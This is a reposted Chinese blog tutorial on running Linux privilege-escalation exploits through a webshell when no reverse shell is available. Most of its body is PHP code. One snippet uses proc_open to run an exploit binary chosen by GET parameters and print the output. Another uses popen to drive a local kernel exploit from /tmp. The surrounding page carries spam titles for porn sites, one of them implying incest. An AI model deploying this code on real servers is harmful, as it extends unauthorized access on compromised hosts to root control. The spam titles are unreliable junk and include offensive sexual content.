国产片侵犯亲女视频播放_亚洲精品二区_在线免费国产视频_欧美精品一区二区三区在线_少妇久久久_在线观看av不卡

服務器之家:專注于服務器技術及軟件下載分享
分類導航

Linux|Centos|Ubuntu|系統進程|Fedora|注冊表|Bios|Solaris|Windows7|Windows10|Windows11|windows server|

服務器之家 - 服務器系統 - Linux - Linux下非交互式提權詳解

Linux下非交互式提權詳解

2022-01-04 17:05該隱 Linux

這篇文章主要介紹了Linux下非交互式提權的相關資料,文中介紹的非常詳細,對大家具有一定的參考價值,需要的朋友們下面來一起看看吧。

前言

之前拿到某站的Webshell之后,在提權的時候發現網站不能反彈shell。而且,在滲透的時候經常遇到那種不能反彈shell的,你的提權工具拿上去之后因為沒有交互式的環境,也不知道提權是否成功。因此,寫了一個簡單的工具。需要的朋友們可以參考學習。

方法如下

proce_open()

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
// path是提權工具的絕對路徑,例如:/usr/local/htdocs/2.6.18
// cmd是你需要執行的命令,例如:whoami
if(isset($_GET['path']) && isset($_GET['cmd'])){
 $path = $_GET['path'];
 $cmd = $_GET['cmd'];
 $descriptorspec = array(
  0 => array("pipe", "r"),
  1 => array("pipe", "w"),
  2 => array("pipe", "w")
 );
 $process = proc_open($path, $descriptorspec, $pipes);
 
 if (is_resource($process)) {
  fwrite($pipes[0],$cmd);
  fclose($pipes[0]);
  echo stream_get_contents($pipes[1]);
  echo stream_get_contents($pipes[2]);
  fclose($pipes[1]);
  fclose($pipes[2]);
  $return_value = proc_close($process);
 
}

代碼很簡單,不懂的可以看看PHP手冊,popen()在這里也可以實現相同的效果

另外,有了這個代碼之后,我們以后提權是不是就可以直接把提權工具扔到服務器上面,然后PHP代碼改一改,循環測試哪些提權工具是可用的了。

popen()

這是土司之前一個人發的,代碼原封不動的放在了下面。稍微改一改就能達到上面一樣的效果

?
1
2
3
4
$sucommand = "/tmp/2.6.18-2011";
$fp = popen($sucommand ,"w");
fputs($fp,"echo 22222 > /tmp/sbsbsbsbsbsb11111");
pclose($fp);

總結

以上就是這篇文章的全部內容了,希望本文的內容對大家的學習或者工作能帶來一定的幫助,如果有疑問大家可以留言交流,謝謝大家對服務器之家的支持。

原文鏈接:http://ecma.io/?p=611

延伸 · 閱讀

精彩推薦
主站蜘蛛池模板: 成人黄色av | 成人小视频在线看 | 国产日产久久高清欧美一区 | 日韩欧美一级精品久久 | 成人免费视频网站在线观看 | 欧美日韩国产精品 | 成人免费观看www的片 | 欧美精品在线一区 | 日韩中文字幕一区二区三区 | 欧美日韩在线播放 | 国产精品成人一区二区 | 欧美日本在线观看 | 91精品国产日韩91久久久久久 | 国产精品成人一区二区三区 | 亚洲综合中文 | 在线色网站| 五月婷婷在线观看视频 | 国产一级一级特黄女人精品毛片 | 日韩欧美在线一区二区 | 欧美日韩亚洲一区二区 | 日本久久久久久 | 国产精品成人在线视频 | 91久久精品一区二区二区 | 久久久久国产一区二区三区四区 | 九九在线国产视频 | 日韩欧美在线观看 | 亚洲国产精品久久 | 欧美日韩一区二区三区在线观看 | 影音先锋中文字幕在线观看 | 黄色a视频| 一区二区三区无码高清视频 | 日本一区二区三区四区 | 亚洲精品久久 | 精品久久久久久国产 | 日本三级精品视频 | 久久久av| 免费精品视频一区二区三区 | 日本成人一区 | 国产在亚洲 线视频播放 | 欧美a在线| 国内精品在线视频 |